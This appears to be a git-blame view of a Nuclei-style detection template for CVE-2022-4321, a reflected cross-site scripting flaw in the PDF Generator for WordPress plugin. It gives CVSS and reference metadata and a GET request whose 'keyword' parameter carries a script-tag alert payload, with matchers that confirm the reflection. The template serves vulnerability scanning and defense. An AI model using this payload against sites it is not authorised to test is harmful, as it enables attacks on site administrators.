2023-04-21 08:56:01 +00:00
id : CVE-2022-4321
info :
name : PDF Generator for WordPress < 1.1.2 - Cross Site Scripting
author : r3Y3r53
severity : medium
description : |
The plugin includes a vendored dompdf example file which is susceptible to Reflected Cross-Site Scripting and could be used against high privilege users such as admin
reference :
- https://wpscan.com/vulnerability/6ac1259c-86d9-428b-ba98-7f3d07910644
- https://nvd.nist.gov/vuln/detail/CVE-2022-4321
- https://wordpress.org/plugins/pdf-generator-for-wp/
2023-07-11 19:49:27 +00:00
remediation : Fixed in version 1.1.2
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
cve-id : CVE-2022-4321
cwe-id : CWE-79
epss-score : 0.00064
cpe : cpe:2.3:a:wpswings:pdf_generator_for_wordpress:*:*:*:*:*:wordpress:*:*
2023-08-31 11:46:18 +00:00
epss-percentile : 0.26173
2023-04-21 08:56:01 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 1
2023-06-04 08:13:42 +00:00
verified : true
2023-07-11 19:49:27 +00:00
framework : wordpress
vendor : wpswings
product : pdf_generator_for_wordpress
2023-04-21 08:56:01 +00:00
tags : cve,cve2022,wpscan,wordpress,wp,wp-plugin,xss,pdf-generator-for-wp
2023-04-27 04:28:59 +00:00
http :
2023-04-21 08:56:01 +00:00
- method : GET
path :
2023-04-21 09:05:21 +00:00
- '{{BaseURL}}/wp-content/plugins/pdf-generator-for-wp/package/lib/dompdf/vendor/dompdf/dompdf/I18N/Arabic/Examples/Query.php?keyword="><script>alert(document.domain)</script>'
2023-04-21 08:56:01 +00:00
matchers-condition : and
matchers :
- type : word
part : body
words :
- '><script>alert(document.domain)</script>'
- 'pdf-generator-for-wp'
condition : and
- type : word
part : header
words :
- "text/html"
- type : status
status :
- 200